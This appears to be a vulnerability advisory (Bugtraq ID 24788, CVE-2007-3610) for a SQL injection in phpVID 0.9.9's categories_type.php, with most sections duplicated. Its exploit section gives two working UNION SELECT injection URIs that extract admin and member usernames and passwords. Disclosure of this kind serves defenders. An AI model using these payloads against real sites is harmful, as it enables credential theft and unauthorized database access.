Vastal I-Tech PHPVID Categories_Type.PHP SQL Injection Vulnerability
BID:24788
Info
Vastal I-Tech PHPVID Categories_Type.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24788 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3610 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 06 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | t0pP8uZz & xprog are credited with the discovery of this vulnerability. |
| Vulnerable: |
Vastal I-Tech phpVID 0.9.9 |
| Not Vulnerable: | |
Discussion
Vastal I-Tech PHPVID Categories_Type.PHP SQL Injection Vulnerability
phpVID is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects phpVID 0.9.9; other versions are also affected.
phpVID is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects phpVID 0.9.9; other versions are also affected.
Exploit / POC
Vastal I-Tech PHPVID Categories_Type.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(admin_user,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/admin_users/*
http://www.example.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/members/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(admin_user,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/admin_users/*
http://www.example.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/members/*
Solution / Fix
Vastal I-Tech PHPVID Categories_Type.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Vastal I-Tech PHPVID Categories_Type.PHP SQL Injection Vulnerability
References:
References:
- phpVID Homepage (Vastal I-Tech)